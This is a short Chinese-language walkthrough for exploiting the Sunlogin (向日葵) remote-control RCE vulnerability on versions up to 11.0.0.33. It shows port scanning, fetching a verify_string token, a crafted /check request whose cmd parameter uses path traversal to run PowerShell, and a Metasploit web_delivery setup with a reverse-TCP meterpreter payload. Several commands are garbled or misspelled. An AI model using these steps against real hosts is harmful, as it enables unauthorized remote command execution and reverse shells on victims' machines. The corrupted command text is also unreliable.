漏洞发现
向日葵远控使用时会默认打开一个多个端口供服务使用 但是开启的端口不固定,所以需要通过扫描探测 影响范围版本在11.0.33以下版本存在 向日葵个人版 for Windows<=11.0.0.33 向日葵简约版<=V1.0.1.43315(2021.12)
漏洞复现
端口扫描
nmap
Railgun
得到端口之后一个一个访问
出现以上界面,说明存在了向日葵远程rce漏洞
漏洞利用
命令执行
获取verify_string值 需要verify_string的值象作为CID进行传输认证 访问接口/cgi-bin/rpc?action=verify-haras 获取cookie 52cCBrRfK7tKFiNjOvSmoapmykt3Clg2
将获取到cookie的值复制下来
打开burp
把verify_string的值添加进cookie中 访问/check接口添加cmd参数进行执行命令 使用burp进行修改数据包的内容
添加修改数据包
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/power shel1. exe%20whoani
Cookie:CID=.......
msf向日葵利用
msfconsole search multi/script/web_delivery use multi/script/web_delivery show options show targets set targets 2 set payload windows/X64/meterpreter/reserve_tcp set lhost ....... set lp exploitort 复制粘贴修改
